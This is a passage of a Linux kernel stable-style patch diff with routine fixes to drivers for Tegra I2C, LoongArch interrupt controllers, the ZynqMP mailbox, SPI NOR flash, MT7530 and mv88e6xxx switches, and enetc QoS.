+  * @is_vi: identifies the VI I2C controller, has a different register layout
+  * @msg_complete: transfer completion notifier
++ * @msg_buf_remaining: size of unsent data in the message buffer
++ * @msg_len: length of message in current transfer
+  * @msg_err: error code for completed message
+  * @msg_buf: pointer to current message data
+- * @msg_buf_remaining: size of unsent data in the message buffer
+  * @msg_read: indicates that the transfer is a read access
+  * @timings: i2c timings information like bus frequency
+  * @multimaster_mode: indicates that I2C controller is in multi-master mode
+@@ -277,6 +278,7 @@ struct tegra_i2c_dev {
+ 
+ 	struct completion msg_complete;
+ 	size_t msg_buf_remaining;
++	unsigned int msg_len;
+ 	int msg_err;
+ 	u8 *msg_buf;
+ 
+@@ -1169,7 +1171,7 @@ static void tegra_i2c_push_packet_header(struct tegra_i2c_dev *i2c_dev,
+ 	else
+ 		i2c_writel(i2c_dev, packet_header, I2C_TX_FIFO);
+ 
+-	packet_header = msg->len - 1;
++	packet_header = i2c_dev->msg_len - 1;
+ 
+ 	if (i2c_dev->dma_mode && !i2c_dev->msg_read)
+ 		*dma_buf++ = packet_header;
+@@ -1242,20 +1244,32 @@ static int tegra_i2c_xfer_msg(struct tegra_i2c_dev *i2c_dev,
+ 		return err;
+ 
+ 	i2c_dev->msg_buf = msg->buf;
++	i2c_dev->msg_len = msg->len;
+ 
+-	/* The condition true implies smbus block read and len is already read */
+-	if (msg->flags & I2C_M_RECV_LEN && end_state != MSG_END_CONTINUE)
+-		i2c_dev->msg_buf = msg->buf + 1;
+-
+-	i2c_dev->msg_buf_remaining = msg->len;
+ 	i2c_dev->msg_err = I2C_ERR_NONE;
+ 	i2c_dev->msg_read = !!(msg->flags & I2C_M_RD);
+ 	reinit_completion(&i2c_dev->msg_complete);
+ 
++	/*
++	 * For SMBUS block read command, read only 1 byte in the first transfer.
++	 * Adjust that 1 byte for the next transfer in the msg buffer and msg
++	 * length.
++	 */
++	if (msg->flags & I2C_M_RECV_LEN) {
++		if (end_state == MSG_END_CONTINUE) {
++			i2c_dev->msg_len = 1;
++		} else {
++			i2c_dev->msg_buf += 1;
++			i2c_dev->msg_len -= 1;
++		}
++	}
++
++	i2c_dev->msg_buf_remaining = i2c_dev->msg_len;
++
+ 	if (i2c_dev->msg_read)
+-		xfer_size = msg->len;
++		xfer_size = i2c_dev->msg_len;
+ 	else
+-		xfer_size = msg->len + I2C_PACKET_HEADER_SIZE;
++		xfer_size = i2c_dev->msg_len + I2C_PACKET_HEADER_SIZE;
+ 
+ 	xfer_size = ALIGN(xfer_size, BYTES_PER_FIFO_WORD);
+ 
+@@ -1295,7 +1309,7 @@ static int tegra_i2c_xfer_msg(struct tegra_i2c_dev *i2c_dev,
+ 	if (!i2c_dev->msg_read) {
+ 		if (i2c_dev->dma_mode) {
+ 			memcpy(i2c_dev->dma_buf + I2C_PACKET_HEADER_SIZE,
+-			       msg->buf, msg->len);
++			       msg->buf, i2c_dev->msg_len);
+ 
+ 			dma_sync_single_for_device(i2c_dev->dma_dev,
+ 						   i2c_dev->dma_phys,
+@@ -1352,7 +1366,7 @@ static int tegra_i2c_xfer_msg(struct tegra_i2c_dev *i2c_dev,
+ 						i2c_dev->dma_phys,
+ 						xfer_size, DMA_FROM_DEVICE);
+ 
+-			memcpy(i2c_dev->msg_buf, i2c_dev->dma_buf, msg->len);
++			memcpy(i2c_dev->msg_buf, i2c_dev->dma_buf, i2c_dev->msg_len);
+ 		}
+ 	}
+ 
+@@ -1408,8 +1422,8 @@ static int tegra_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msgs[],
+ 			ret = tegra_i2c_xfer_msg(i2c_dev, &msgs[i], MSG_END_CONTINUE);
+ 			if (ret)
+ 				break;
+-			/* Set the read byte as msg len */
+-			msgs[i].len = msgs[i].buf[0];
++			/* Set the msg length from first byte */
++			msgs[i].len += msgs[i].buf[0];
+ 			dev_dbg(i2c_dev->dev, "reading %d bytes\n", msgs[i].len);
+ 		}
+ 		ret = tegra_i2c_xfer_msg(i2c_dev, &msgs[i], end_type);
+diff --git a/drivers/irqchip/irq-loongarch-cpu.c b/drivers/irqchip/irq-loongarch-cpu.c
+index 741612ba6a520..fdec3e9cfacfb 100644
+--- a/drivers/irqchip/irq-loongarch-cpu.c
++++ b/drivers/irqchip/irq-loongarch-cpu.c
+@@ -92,18 +92,16 @@ static const struct irq_domain_ops loongarch_cpu_intc_irq_domain_ops = {
+ 	.xlate = irq_domain_xlate_onecell,
+ };
+ 
+-static int __init
+-liointc_parse_madt(union acpi_subtable_headers *header,
+-		       const unsigned long end)
++static int __init liointc_parse_madt(union acpi_subtable_headers *header,
++					const unsigned long end)
+ {
+ 	struct acpi_madt_lio_pic *liointc_entry = (struct acpi_madt_lio_pic *)header;
+ 
+ 	return liointc_acpi_init(irq_domain, liointc_entry);
+ }
+ 
+-static int __init
+-eiointc_parse_madt(union acpi_subtable_headers *header,
+-		       const unsigned long end)
++static int __init eiointc_parse_madt(union acpi_subtable_headers *header,
++					const unsigned long end)
+ {
+ 	struct acpi_madt_eio_pic *eiointc_entry = (struct acpi_madt_eio_pic *)header;
+ 
+@@ -112,16 +110,24 @@ eiointc_parse_madt(union acpi_subtable_headers *header,
+ 
+ static int __init acpi_cascade_irqdomain_init(void)
+ {
+-	acpi_table_parse_madt(ACPI_MADT_TYPE_LIO_PIC,
+-			      liointc_parse_madt, 0);
+-	acpi_table_parse_madt(ACPI_MADT_TYPE_EIO_PIC,
+-			      eiointc_parse_madt, 0);
++	int r;
++
++	r = acpi_table_parse_madt(ACPI_MADT_TYPE_LIO_PIC, liointc_parse_madt, 0);
++	if (r < 0)
++		return r;
++
++	r = acpi_table_parse_madt(ACPI_MADT_TYPE_EIO_PIC, eiointc_parse_madt, 0);
++	if (r < 0)
++		return r;
++
+ 	return 0;
+ }
+ 
+ static int __init cpuintc_acpi_init(union acpi_subtable_headers *header,
+ 				   const unsigned long end)
+ {
++	int ret;
++
+ 	if (irq_domain)
+ 		return 0;
+ 
+@@ -139,9 +145,9 @@ static int __init cpuintc_acpi_init(union acpi_subtable_headers *header,
+ 	set_handle_irq(&handle_cpu_irq);
+ 	acpi_set_irq_model(ACPI_IRQ_MODEL_LPIC, lpic_get_gsi_domain_id);
+ 	acpi_set_gsi_to_irq_fallback(lpic_gsi_to_irq);
+-	acpi_cascade_irqdomain_init();
++	ret = acpi_cascade_irqdomain_init();
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ IRQCHIP_ACPI_DECLARE(cpuintc_v1, ACPI_MADT_TYPE_CORE_PIC,
+diff --git a/drivers/irqchip/irq-loongson-eiointc.c b/drivers/irqchip/irq-loongson-eiointc.c
+index 16e9af8d8b1ea..ac04aeaa2d308 100644
+--- a/drivers/irqchip/irq-loongson-eiointc.c
++++ b/drivers/irqchip/irq-loongson-eiointc.c
+@@ -279,9 +279,6 @@ static void acpi_set_vec_parent(int node, struct irq_domain *parent, struct acpi
+ {
+ 	int i;
+ 
+-	if (cpu_has_flatmode)
+-		node = cpu_to_node(node * CORES_PER_EIO_NODE);
+-
+ 	for (i = 0; i < MAX_IO_PICS; i++) {
+ 		if (node == vec_group[i].node) {
+ 			vec_group[i].parent = parent;
+@@ -301,9 +298,8 @@ static struct irq_domain *acpi_get_vec_parent(int node, struct acpi_vector_group
+ 	return NULL;
+ }
+ 
+-static int __init
+-pch_pic_parse_madt(union acpi_subtable_headers *header,
+-		       const unsigned long end)
++static int __init pch_pic_parse_madt(union acpi_subtable_headers *header,
++					const unsigned long end)
+ {
+ 	struct acpi_madt_bio_pic *pchpic_entry = (struct acpi_madt_bio_pic *)header;
+ 	unsigned int node = (pchpic_entry->address >> 44) & 0xf;
+@@ -312,37 +308,51 @@ pch_pic_parse_madt(union acpi_subtable_headers *header,
+ 	if (parent)
+ 		return pch_pic_acpi_init(parent, pchpic_entry);
+ 
+-	return -EINVAL;
++	return 0;
+ }
+ 
+-static int __init
+-pch_msi_parse_madt(union acpi_subtable_headers *header,
+-		       const unsigned long end)
++static int __init pch_msi_parse_madt(union acpi_subtable_headers *header,
++					const unsigned long end)
+ {
++	struct irq_domain *parent;
+ 	struct acpi_madt_msi_pic *pchmsi_entry = (struct acpi_madt_msi_pic *)header;
+-	struct irq_domain *parent = acpi_get_vec_parent(eiointc_priv[nr_pics - 1]->node, msi_group);
++	int node;
++
++	if (cpu_has_flatmode)
++		node = cpu_to_node(eiointc_priv[nr_pics - 1]->node * CORES_PER_EIO_NODE);
++	else
++		node = eiointc_priv[nr_pics - 1]->node;
++
++	parent = acpi_get_vec_parent(node, msi_group);
+ 
+ 	if (parent)
+ 		return pch_msi_acpi_init(parent, pchmsi_entry);
+ 
+-	return -EINVAL;
++	return 0;
+ }
+ 
+ static int __init acpi_cascade_irqdomain_init(void)
+ {
+-	acpi_table_parse_madt(ACPI_MADT_TYPE_BIO_PIC,
+-			      pch_pic_parse_madt, 0);
+-	acpi_table_parse_madt(ACPI_MADT_TYPE_MSI_PIC,
+-			      pch_msi_parse_madt, 1);
++	int r;
++
++	r = acpi_table_parse_madt(ACPI_MADT_TYPE_BIO_PIC, pch_pic_parse_madt, 0);
++	if (r < 0)
++		return r;
++
++	r = acpi_table_parse_madt(ACPI_MADT_TYPE_MSI_PIC, pch_msi_parse_madt, 1);
++	if (r < 0)
++		return r;
++
+ 	return 0;
+ }
+ 
+ int __init eiointc_acpi_init(struct irq_domain *parent,
+ 				     struct acpi_madt_eio_pic *acpi_eiointc)
+ {
+-	int i, parent_irq;
++	int i, ret, parent_irq;
+ 	unsigned long node_map;
+ 	struct eiointc_priv *priv;
++	int node;
+ 
+ 	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
+ 	if (!priv)
+@@ -380,15 +390,21 @@ int __init eiointc_acpi_init(struct irq_domain *parent,
+ 	parent_irq = irq_create_mapping(parent, acpi_eiointc->cascade);
+ 	irq_set_chained_handler_and_data(parent_irq, eiointc_irq_dispatch, priv);
+ 
+-	cpuhp_setup_state_nocalls(CPUHP_AP_IRQ_LOONGARCH_STARTING,
++	if (nr_pics == 1) {
++		cpuhp_setup_state_nocalls(CPUHP_AP_IRQ_LOONGARCH_STARTING,
+ 				  "irqchip/loongarch/intc:starting",
+ 				  eiointc_router_init, NULL);
++	}
+ 
+-	acpi_set_vec_parent(acpi_eiointc->node, priv->eiointc_domain, pch_group);
+-	acpi_set_vec_parent(acpi_eiointc->node, priv->eiointc_domain, msi_group);
+-	acpi_cascade_irqdomain_init();
+-
+-	return 0;
++	if (cpu_has_flatmode)
++		node = cpu_to_node(acpi_eiointc->node * CORES_PER_EIO_NODE);
++	else
++		node = acpi_eiointc->node;
++	acpi_set_vec_parent(node, priv->eiointc_domain, pch_group);
++	acpi_set_vec_parent(node, priv->eiointc_domain, msi_group);
++	ret = acpi_cascade_irqdomain_init();
++
++	return ret;
+ 
+ out_free_handle:
+ 	irq_domain_free_fwnode(priv->domain_handle);
+diff --git a/drivers/irqchip/irq-loongson-pch-pic.c b/drivers/irqchip/irq-loongson-pch-pic.c
+index 03493cda65a37..679e2b68e6e9d 100644
+--- a/drivers/irqchip/irq-loongson-pch-pic.c
++++ b/drivers/irqchip/irq-loongson-pch-pic.c
+@@ -328,9 +328,8 @@ int find_pch_pic(u32 gsi)
+ 	return -1;
+ }
+ 
+-static int __init
+-pch_lpc_parse_madt(union acpi_subtable_headers *header,
+-		       const unsigned long end)
++static int __init pch_lpc_parse_madt(union acpi_subtable_headers *header,
++					const unsigned long end)
+ {
+ 	struct acpi_madt_lpc_pic *pchlpc_entry = (struct acpi_madt_lpc_pic *)header;
+ 
+@@ -339,8 +338,12 @@ pch_lpc_parse_madt(union acpi_subtable_headers *header,
+ 
+ static int __init acpi_cascade_irqdomain_init(void)
+ {
+-	acpi_table_parse_madt(ACPI_MADT_TYPE_LPC_PIC,
+-			      pch_lpc_parse_madt, 0);
++	int r;
++
++	r = acpi_table_parse_madt(ACPI_MADT_TYPE_LPC_PIC, pch_lpc_parse_madt, 0);
++	if (r < 0)
++		return r;
++
+ 	return 0;
+ }
+ 
+@@ -350,6 +353,9 @@ int __init pch_pic_acpi_init(struct irq_domain *parent,
+ 	int ret, vec_base;
+ 	struct fwnode_handle *domain_handle;
+ 
++	if (find_pch_pic(acpi_pchpic->gsi_base) >= 0)
++		return 0;
++
+ 	vec_base = acpi_pchpic->gsi_base - GSI_MIN_PCH_IRQ;
+ 
+ 	domain_handle = irq_domain_alloc_fwnode(&acpi_pchpic->address);
+@@ -367,7 +373,7 @@ int __init pch_pic_acpi_init(struct irq_domain *parent,
+ 	}
+ 
+ 	if (acpi_pchpic->id == 0)
+-		acpi_cascade_irqdomain_init();
++		ret = acpi_cascade_irqdomain_init();
+ 
+ 	return ret;
+ }
+diff --git a/drivers/mailbox/zynqmp-ipi-mailbox.c b/drivers/mailbox/zynqmp-ipi-mailbox.c
+index e02a4a18e8c29..d097f45b0e5f5 100644
+--- a/drivers/mailbox/zynqmp-ipi-mailbox.c
++++ b/drivers/mailbox/zynqmp-ipi-mailbox.c
+@@ -110,7 +110,7 @@ struct zynqmp_ipi_pdata {
+ 	unsigned int method;
+ 	u32 local_id;
+ 	int num_mboxes;
+-	struct zynqmp_ipi_mbox *ipi_mboxes;
++	struct zynqmp_ipi_mbox ipi_mboxes[];
+ };
+ 
+ static struct device_driver zynqmp_ipi_mbox_driver = {
+@@ -634,8 +634,13 @@ static int zynqmp_ipi_probe(struct platform_device *pdev)
+ 	struct zynqmp_ipi_mbox *mbox;
+ 	int num_mboxes, ret = -EINVAL;
+ 
+-	num_mboxes = of_get_child_count(np);
+-	pdata = devm_kzalloc(dev, sizeof(*pdata) + (num_mboxes * sizeof(*mbox)),
++	num_mboxes = of_get_available_child_count(np);
++	if (num_mboxes == 0) {
++		dev_err(dev, "mailbox nodes not available\n");
++		return -EINVAL;
++	}
++
++	pdata = devm_kzalloc(dev, struct_size(pdata, ipi_mboxes, num_mboxes),
+ 			     GFP_KERNEL);
+ 	if (!pdata)
+ 		return -ENOMEM;
+@@ -649,8 +654,6 @@ static int zynqmp_ipi_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	pdata->num_mboxes = num_mboxes;
+-	pdata->ipi_mboxes = (struct zynqmp_ipi_mbox *)
+-			    ((char *)pdata + sizeof(*pdata));
+ 
+ 	mbox = pdata->ipi_mboxes;
+ 	for_each_available_child_of_node(np, nc) {
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index 9a7bea365acb7..dc4d86ceee447 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -2440,6 +2440,9 @@ static void spi_nor_init_flags(struct spi_nor *nor)
+ 
+ 	if (flags & NO_CHIP_ERASE)
+ 		nor->flags |= SNOR_F_NO_OP_CHIP_ERASE;
++
++	if (flags & SPI_NOR_RWW)
++		nor->flags |= SNOR_F_RWW;
+ }
+ 
+ /**
+@@ -2578,6 +2581,12 @@ static void spi_nor_init_default_params(struct spi_nor *nor)
+ 	params->hwcaps.mask |= SNOR_HWCAPS_PP;
+ 	spi_nor_set_pp_settings(&params->page_programs[SNOR_CMD_PP],
+ 				SPINOR_OP_PP, SNOR_PROTO_1_1_1);
++
++	if (info->flags & SPI_NOR_QUAD_PP) {
++		params->hwcaps.mask |= SNOR_HWCAPS_PP_1_1_4;
++		spi_nor_set_pp_settings(&params->page_programs[SNOR_CMD_PP_1_1_4],
++					SPINOR_OP_PP_1_1_4, SNOR_PROTO_1_1_4);
++	}
+ }
+ 
+ /**
+@@ -2933,6 +2942,9 @@ static void spi_nor_set_mtd_info(struct spi_nor *nor)
+ 		mtd->name = dev_name(dev);
+ 	mtd->type = MTD_NORFLASH;
+ 	mtd->flags = MTD_CAP_NORFLASH;
++	/* Unset BIT_WRITEABLE to enable JFFS2 write buffer for ECC'd NOR */
++	if (nor->flags & SNOR_F_ECC)
++		mtd->flags &= ~MTD_BIT_WRITEABLE;
+ 	if (nor->info->flags & SPI_NOR_NO_ERASE)
+ 		mtd->flags |= MTD_NO_ERASE;
+ 	else
+diff --git a/drivers/mtd/spi-nor/core.h b/drivers/mtd/spi-nor/core.h
+index 00bf0d0e955a0..290613fd63ae7 100644
+--- a/drivers/mtd/spi-nor/core.h
++++ b/drivers/mtd/spi-nor/core.h
+@@ -130,6 +130,8 @@ enum spi_nor_option_flags {
+ 	SNOR_F_IO_MODE_EN_VOLATILE = BIT(11),
+ 	SNOR_F_SOFT_RESET	= BIT(12),
+ 	SNOR_F_SWP_IS_VOLATILE	= BIT(13),
++	SNOR_F_RWW		= BIT(14),
++	SNOR_F_ECC		= BIT(15),
+ };
+ 
+ struct spi_nor_read_command {
+@@ -458,6 +460,8 @@ struct spi_nor_fixups {
+  *   SPI_NOR_NO_ERASE:        no erase command needed.
+  *   NO_CHIP_ERASE:           chip does not support chip erase.
+  *   SPI_NOR_NO_FR:           can't do fastread.
++ *   SPI_NOR_QUAD_PP:         flash supports Quad Input Page Program.
++ *   SPI_NOR_RWW:             flash supports reads while write.
+  *
+  * @no_sfdp_flags:  flags that indicate support that can be discovered via SFDP.
+  *                  Used when SFDP tables are not defined in the flash. These
+@@ -507,6 +511,8 @@ struct flash_info {
+ #define SPI_NOR_NO_ERASE		BIT(6)
+ #define NO_CHIP_ERASE			BIT(7)
+ #define SPI_NOR_NO_FR			BIT(8)
++#define SPI_NOR_QUAD_PP			BIT(9)
++#define SPI_NOR_RWW			BIT(10)
+ 
+ 	u8 no_sfdp_flags;
+ #define SPI_NOR_SKIP_SFDP		BIT(0)
+diff --git a/drivers/mtd/spi-nor/debugfs.c b/drivers/mtd/spi-nor/debugfs.c
+index 5f56b23205d8b..6d6bd559db8fd 100644
+--- a/drivers/mtd/spi-nor/debugfs.c
++++ b/drivers/mtd/spi-nor/debugfs.c
+@@ -25,6 +25,8 @@ static const char *const snor_f_names[] = {
+ 	SNOR_F_NAME(IO_MODE_EN_VOLATILE),
+ 	SNOR_F_NAME(SOFT_RESET),
+ 	SNOR_F_NAME(SWP_IS_VOLATILE),
++	SNOR_F_NAME(RWW),
++	SNOR_F_NAME(ECC),
+ };
+ #undef SNOR_F_NAME
+ 
+diff --git a/drivers/mtd/spi-nor/issi.c b/drivers/mtd/spi-nor/issi.c
+index 89a66a19d754f..7c8eee808dda6 100644
+--- a/drivers/mtd/spi-nor/issi.c
++++ b/drivers/mtd/spi-nor/issi.c
+@@ -73,6 +73,7 @@ static const struct flash_info issi_nor_parts[] = {
+ 	{ "is25wp256", INFO(0x9d7019, 0, 64 * 1024, 512)
+ 		NO_SFDP_FLAGS(SECT_4K | SPI_NOR_DUAL_READ | SPI_NOR_QUAD_READ)
+ 		FIXUP_FLAGS(SPI_NOR_4B_OPCODES)
++		FLAGS(SPI_NOR_QUAD_PP)
+ 		.fixups = &is25lp256_fixups },
+ 
+ 	/* PMC */
+diff --git a/drivers/mtd/spi-nor/spansion.c b/drivers/mtd/spi-nor/spansion.c
+index 7ac2ad1a8d576..7e7c68fc7776d 100644
+--- a/drivers/mtd/spi-nor/spansion.c
++++ b/drivers/mtd/spi-nor/spansion.c
+@@ -212,6 +212,17 @@ static int cypress_nor_set_page_size(struct spi_nor *nor)
+ 	return 0;
+ }
+ 
++static void cypress_nor_ecc_init(struct spi_nor *nor)
++{
++	/*
++	 * Programming is supported only in 16-byte ECC data unit granularity.
++	 * Byte-programming, bit-walking, or multiple program operations to the
++	 * same ECC data unit without an erase are not allowed.
++	 */
++	nor->params->writesize = 16;
++	nor->flags |= SNOR_F_ECC;
++}
++
+ static int
+ s25hx_t_post_bfpt_fixup(struct spi_nor *nor,
+ 			const struct sfdp_parameter_header *bfpt_header,
+@@ -249,13 +260,10 @@ static void s25hx_t_post_sfdp_fixup(struct spi_nor *nor)
+ 
+ static void s25hx_t_late_init(struct spi_nor *nor)
+ {
+-	struct spi_nor_flash_parameter *params = nor->params;
+-
+ 	/* Fast Read 4B requires mode cycles */
+-	params->reads[SNOR_CMD_READ_FAST].num_mode_clocks = 8;
++	nor->params->reads[SNOR_CMD_READ_FAST].num_mode_clocks = 8;
+ 
+-	/* The writesize should be ECC data unit size */
+-	params->writesize = 16;
++	cypress_nor_ecc_init(nor);
+ }
+ 
+ static struct spi_nor_fixups s25hx_t_fixups = {
+@@ -280,12 +288,6 @@ static int cypress_nor_octal_dtr_enable(struct spi_nor *nor, bool enable)
+ 			cypress_nor_octal_dtr_dis(nor);
+ }
+ 
+-static void s28hs512t_default_init(struct spi_nor *nor)
+-{
+-	nor->params->octal_dtr_enable = cypress_nor_octal_dtr_enable;
+-	nor->params->writesize = 16;
+-}
+-
+ static void s28hs512t_post_sfdp_fixup(struct spi_nor *nor)
+ {
+ 	/*
+@@ -321,10 +323,16 @@ static int s28hs512t_post_bfpt_fixup(struct spi_nor *nor,
+ 	return cypress_nor_set_page_size(nor);
+ }
+ 
++static void s28hs512t_late_init(struct spi_nor *nor)
++{
++	nor->params->octal_dtr_enable = cypress_nor_octal_dtr_enable;
++	cypress_nor_ecc_init(nor);
++}
++
+ static const struct spi_nor_fixups s28hs512t_fixups = {
+-	.default_init = s28hs512t_default_init,
+ 	.post_sfdp = s28hs512t_post_sfdp_fixup,
+ 	.post_bfpt = s28hs512t_post_bfpt_fixup,
++	.late_init = s28hs512t_late_init,
+ };
+ 
+ static int
+@@ -459,8 +467,7 @@ static const struct flash_info spansion_nor_parts[] = {
+ 	{ "cy15x104q",  INFO6(0x042cc2, 0x7f7f7f, 512 * 1024, 1)
+ 		FLAGS(SPI_NOR_NO_ERASE) },
+ 	{ "s28hs512t",   INFO(0x345b1a,      0, 256 * 1024, 256)
+-		NO_SFDP_FLAGS(SECT_4K | SPI_NOR_OCTAL_DTR_READ |
+-			      SPI_NOR_OCTAL_DTR_PP)
++		PARSE_SFDP
+ 		.fixups = &s28hs512t_fixups,
+ 	},
+ };
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index 38bf760b5b5ee..855220c5ce339 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -446,9 +446,9 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 		else
+ 			ssc_delta = 0x87;
+ 		if (priv->id == ID_MT7621) {
+-			/* PLL frequency: 150MHz: 1.2GBit */
++			/* PLL frequency: 125MHz: 1.0GBit */
+ 			if (xtal == HWTRAP_XTAL_40MHZ)
+-				ncpo1 = 0x0780;
++				ncpo1 = 0x0640;
+ 			if (xtal == HWTRAP_XTAL_25MHZ)
+ 				ncpo1 = 0x0a00;
+ 		} else { /* PLL frequency: 250MHz: 2.0Gbit */
+@@ -1015,9 +1015,9 @@ mt753x_cpu_port_enable(struct dsa_switch *ds, int port)
+ 	mt7530_write(priv, MT7530_PVC_P(port),
+ 		     PORT_SPEC_TAG);
+ 
+-	/* Disable flooding by default */
+-	mt7530_rmw(priv, MT7530_MFC, BC_FFP_MASK | UNM_FFP_MASK | UNU_FFP_MASK,
+-		   BC_FFP(BIT(port)) | UNM_FFP(BIT(port)) | UNU_FFP(BIT(port)));
++	/* Enable flooding on the CPU port */
++	mt7530_set(priv, MT7530_MFC, BC_FFP(BIT(port)) | UNM_FFP(BIT(port)) |
++		   UNU_FFP(BIT(port)));
+ 
+ 	/* Set CPU port number */
+ 	if (priv->id == ID_MT7621)
+@@ -2312,12 +2312,69 @@ mt7530_setup(struct dsa_switch *ds)
+ 	return 0;
+ }
+ 
++static int
++mt7531_setup_common(struct dsa_switch *ds)
++{
++	struct mt7530_priv *priv = ds->priv;
++	struct dsa_port *cpu_dp;
++	int ret, i;
++
++	/* BPDU to CPU port */
++	dsa_switch_for_each_cpu_port(cpu_dp, ds) {
++		mt7530_rmw(priv, MT7531_CFC, MT7531_CPU_PMAP_MASK,
++			   BIT(cpu_dp->index));
++		break;
++	}
++	mt7530_rmw(priv, MT753X_BPC, MT753X_BPDU_PORT_FW_MASK,
++		   MT753X_BPDU_CPU_ONLY);
++
++	/* Enable and reset MIB counters */
++	mt7530_mib_reset(ds);
++
++	/* Disable flooding on all ports */
++	mt7530_clear(priv, MT7530_MFC, BC_FFP_MASK | UNM_FFP_MASK |
++		     UNU_FFP_MASK);
++
++	for (i = 0; i < MT7530_NUM_PORTS; i++) {
++		/* Disable forwarding by default on all ports */
++		mt7530_rmw(priv, MT7530_PCR_P(i), PCR_MATRIX_MASK,
++			   PCR_MATRIX_CLR);
++
++		/* Disable learning by default on all ports */
++		mt7530_set(priv, MT7530_PSC_P(i), SA_DIS);
++
++		mt7530_set(priv, MT7531_DBG_CNT(i), MT7531_DIS_CLR);
++
++		if (dsa_is_cpu_port(ds, i)) {
++			ret = mt753x_cpu_port_enable(ds, i);
++			if (ret)
++				return ret;
++		} else {
++			mt7530_port_disable(ds, i);
++
++			/* Set default PVID to 0 on all user ports */
++			mt7530_rmw(priv, MT7530_PPBV1_P(i), G0_PORT_VID_MASK,
++				   G0_PORT_VID_DEF);
++		}
++
++		/* Enable consistent egress tag */
++		mt7530_rmw(priv, MT7530_PVC_P(i), PVC_EG_TAG_MASK,
++			   PVC_EG_TAG(MT7530_VLAN_EG_CONSISTENT));
++	}
++
++	/* Flush the FDB table */
++	ret = mt7530_fdb_cmd(priv, MT7530_FDB_FLUSH, NULL);
++	if (ret < 0)
++		return ret;
++
++	return 0;
++}
++
+ static int
+ mt7531_setup(struct dsa_switch *ds)
+ {
+ 	struct mt7530_priv *priv = ds->priv;
+ 	struct mt7530_dummy_poll p;
+-	struct dsa_port *cpu_dp;
+ 	u32 val, id;
+ 	int ret, i;
+ 
+@@ -2395,44 +2452,7 @@ mt7531_setup(struct dsa_switch *ds)
+ 	mt7531_ind_c45_phy_write(priv, MT753X_CTRL_PHY_ADDR, MDIO_MMD_VEND2,
+ 				 CORE_PLL_GROUP4, val);
+ 
+-	/* BPDU to CPU port */
+-	dsa_switch_for_each_cpu_port(cpu_dp, ds) {
+-		mt7530_rmw(priv, MT7531_CFC, MT7531_CPU_PMAP_MASK,
+-			   BIT(cpu_dp->index));
+-		break;
+-	}
+-	mt7530_rmw(priv, MT753X_BPC, MT753X_BPDU_PORT_FW_MASK,
+-		   MT753X_BPDU_CPU_ONLY);
+-
+-	/* Enable and reset MIB counters */
+-	mt7530_mib_reset(ds);
+-
+-	for (i = 0; i < MT7530_NUM_PORTS; i++) {
+-		/* Disable forwarding by default on all ports */
+-		mt7530_rmw(priv, MT7530_PCR_P(i), PCR_MATRIX_MASK,
+-			   PCR_MATRIX_CLR);
+-
+-		/* Disable learning by default on all ports */
+-		mt7530_set(priv, MT7530_PSC_P(i), SA_DIS);
+-
+-		mt7530_set(priv, MT7531_DBG_CNT(i), MT7531_DIS_CLR);
+-
+-		if (dsa_is_cpu_port(ds, i)) {
+-			ret = mt753x_cpu_port_enable(ds, i);
+-			if (ret)
+-				return ret;
+-		} else {
+-			mt7530_port_disable(ds, i);
+-
+-			/* Set default PVID to 0 on all user ports */
+-			mt7530_rmw(priv, MT7530_PPBV1_P(i), G0_PORT_VID_MASK,
+-				   G0_PORT_VID_DEF);
+-		}
+-
+-		/* Enable consistent egress tag */
+-		mt7530_rmw(priv, MT7530_PVC_P(i), PVC_EG_TAG_MASK,
+-			   PVC_EG_TAG(MT7530_VLAN_EG_CONSISTENT));
+-	}
++	mt7531_setup_common(ds);
+ 
+ 	/* Setup VLAN ID 0 for VLAN-unaware bridges */
+ 	ret = mt7530_setup_vlan0(priv);
+@@ -2442,11 +2462,6 @@ mt7531_setup(struct dsa_switch *ds)
+ 	ds->assisted_learning_on_cpu_port = true;
+ 	ds->mtu_enforcement_ingress = true;
+ 
+-	/* Flush the FDB table */
+-	ret = mt7530_fdb_cmd(priv, MT7530_FDB_FLUSH, NULL);
+-	if (ret < 0)
+-		return ret;
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index f1d9ee2a78b0f..12175195d3968 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -5109,6 +5109,7 @@ static const struct mv88e6xxx_ops mv88e6321_ops = {
+ 	.set_cpu_port = mv88e6095_g1_set_cpu_port,
+ 	.set_egress_port = mv88e6095_g1_set_egress_port,
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
++	.mgmt_rsvd2cpu = mv88e6352_g2_mgmt_rsvd2cpu,
+ 	.reset = mv88e6352_g1_reset,
+ 	.vtu_getnext = mv88e6185_g1_vtu_getnext,
+ 	.vtu_loadpurge = mv88e6185_g1_vtu_loadpurge,
+diff --git a/drivers/net/ethernet/freescale/enetc/enetc_qos.c b/drivers/net/ethernet/freescale/enetc/enetc_qos.c
+index fcebb54224c09..a8539a8554a13 100644
+--- a/drivers/net/ethernet/freescale/enetc/enetc_qos.c
++++ b/drivers/net/ethernet/freescale/enetc/enetc_qos.c
+@@ -1255,7 +1255,7 @@ static int enetc_psfp_parse_clsflower(struct enetc_ndev_priv *priv,
+ 		int index;
+ 
+ 		index = enetc_get_free_index(priv);
+-		if (sfi->handle < 0) {
++		if (index < 0) {
+ 			NL_SET_ERR_MSG_MOD(extack, "No Stream Filter resource!");
+ 			err = -ENOSPC;
+ 			goto free_fmi;
+diff --git a/drivers/net/ethernet/intel/ice/ice_tc_lib.c b/drivers/net/ethernet/intel/ice/ice_tc_lib.c
+index 71cb15fcf63b9..652ef09eeb305 100644
+--- a/drivers/net/ethernet/intel/ice/ice_tc_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_tc_lib.c
